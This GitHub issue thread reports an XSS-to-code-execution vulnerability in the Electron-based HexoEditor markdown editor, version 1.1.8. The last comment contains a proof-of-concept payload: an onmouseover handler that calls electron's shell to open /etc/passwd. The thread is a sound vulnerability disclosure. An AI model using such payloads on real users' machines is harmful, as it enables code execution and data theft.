Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS to code execution vulnerability #3

Open
silviavali opened this issue Jan 3, 2018 · 3 comments

Comments

@silviavali
Copy link

commented Jan 3, 2018

As this project has inherited the Moeditor based on the information received here: Moeditor/Moeditor#156

I would like to report XSS to code execution vulnerability in HexoEditor version 1.1.8 . Please do contact me at silviavali14@gmail.com for the poc.

@zhuzhuyule

This comment has been minimized.

Copy link
Owner

commented Jan 3, 2018

hello, what's problem ?

@silviavali

This comment has been minimized.

Copy link
Author

commented Jan 3, 2018

Update: Report sent attached to the e-mail

@silviavali

This comment has been minimized.

Copy link
Author

commented May 17, 2018

"XSS to code execution vulnerability due to enabled node integration"

Vulnerability: XSS to code execution
Version: 1.1.8
Initially reported: January 3rd, 2018
Tested on 16.04.1-Ubuntu

PoC: paste the following payload as the content of the markdown file:

<s <onmouseover="alert(1)"> <s onmouseover="var {shell} = require('electron');
shell.openExternal('file:/etc/passwd'); alert('XSS to code execution')">Hallo</s>

image

then, if you now hover over the word Hallo, the '/etc/passwd' file and an alert with words “XSS to
code execution” will pop up:
image

Attack vector: If the victim is forced or tricked into pasting such code or open a crafted file in the markdown editor, it is possible for the attacker to steal user’s data from the computer or perform any actions on the machine on which the application running on.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.